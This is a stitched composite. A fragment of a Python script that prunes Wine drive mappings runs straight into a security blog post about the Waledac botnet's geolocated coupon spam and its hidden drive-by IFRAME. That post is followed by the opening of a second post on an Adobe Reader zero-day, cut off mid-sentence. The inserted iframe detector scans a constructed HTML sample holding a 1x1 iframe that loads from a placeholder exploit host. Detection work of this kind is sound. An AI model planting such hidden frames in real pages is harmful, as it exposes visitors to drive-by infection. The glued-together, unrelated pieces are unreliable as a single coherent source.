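    dd = make_demo_prefix()          # swap in DEFAULT_DOSDEVICES for a real prefix
    print("mappings:", list_mappings(dd))
    print("would remove:", prune_mappings(dd))
    print("removed:", prune_mappings(dd, dry_run=False))
    print("left:", list_mappings(dd))
    handler = exe_handler()
    print("exe handler:", handler,
          "<- Wine association set" if handler and "wine" in handler.lower() else "")
```

    Run it first with the dry run to see what would go; Wine recreates a z: link only if you let winecfg autodetect drives again, so re-run the audit after any Wine upgrade.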

    Malware Riding on the Tides of the Economic Crisis

    A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want precisely to fool people trying to save some money these days. Spam mails promoting bargains that could help in the recession are hitting inboxes right now.

    When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

    After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: “Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis!” The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

    In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.
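    The drive-by part of this lure lives in an IFRAME the visitor never sees, and that is also what makes it easy to spot in the page source: a frame that loads from a different host and is either tiny or styled invisible. The Python below is an added example for this post, not McAfee code; the HTML it scans is a constructed fragment in the style of the coupon page, with placeholder hosts rather than the campaign’s real ones.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page fragment in the style described above; all hosts are
# placeholders, not the real campaign's infrastructure.
SAMPLE_HTML = """
<html><body>
<h1>Exclusive sale coupons and deals at over 100 000 stores in Springfield, US</h1>
<a href="couponslist.exe">Download the coupon list</a>
<iframe src="http://exploit-host.example.invalid/in.php" width="1" height="1" frameborder="0"></iframe>
<iframe src="/partner-widget" width="300" height="250"></iframe>
<div style="display:none"><iframe src="http://other.example.invalid/x.html"></iframe></div>
</body></html>
"""

# Elements that never have a closing tag, so they must not go on the stack.
VOID = {"br", "img", "input", "meta", "link", "hr", "area", "base", "col",
        "embed", "param", "source", "track", "wbr"}


class IframeCollector(HTMLParser):
    """Records every <iframe> with its size and whether an ancestor hides it."""

    def __init__(self):
        super().__init__()
        self.frames = []
        self._stack = []  # (tag, hidden_by_style) for open elements

    def _inside_hidden(self) -> bool:
        return any(hidden for _, hidden in self._stack)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden_style = "display:none" in style or "visibility:hidden" in style
        if tag == "iframe":
            self.frames.append({
                "src": a.get("src", ""),
                "width": a.get("width"),
                "height": a.get("height"),
                "hidden": hidden_style or self._inside_hidden(),
            })
        if tag not in VOID:
            self._stack.append((tag, hidden_style))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates sloppy markup.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break


def _tiny(value) -> bool:
    """True for a pixel size of 2 or less (the classic 1x1 drive-by frame)."""
    try:
        return int(str(value).lower().rstrip("px")) <= 2
    except (TypeError, ValueError):
        return False


def suspicious_iframes(html: str, page_host: str) -> list:
    """Return src URLs of frames that are off-site AND (tiny OR hidden)."""
    parser = IframeCollector()
    parser.feed(html)
    found = []
    for f in parser.frames:
        host = urlparse(f["src"]).hostname
        offsite = bool(host) and host.lower() != page_host.lower()
        if offsite and (_tiny(f["width"]) and _tiny(f["height"]) or f["hidden"]):
            found.append(f["src"])
    return found


if __name__ == "__main__":
    for src in suspicious_iframes(SAMPLE_HTML, "coupons.example.invalid"):
        print("hidden off-site frame:", src)
```

    The check is deliberately narrow: same-host frames and normally sized third-party widgets are left alone, so on a real page the hits are worth a closer look rather than a flood of false positives.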

    As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

    New BackDoor Attacks Using PDF Documents

    It should need no further reminder that zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

    At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8.x and 9.x. In parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks, found in the field, use the infamous “HeapSpray” method via JavaScript to achieve control of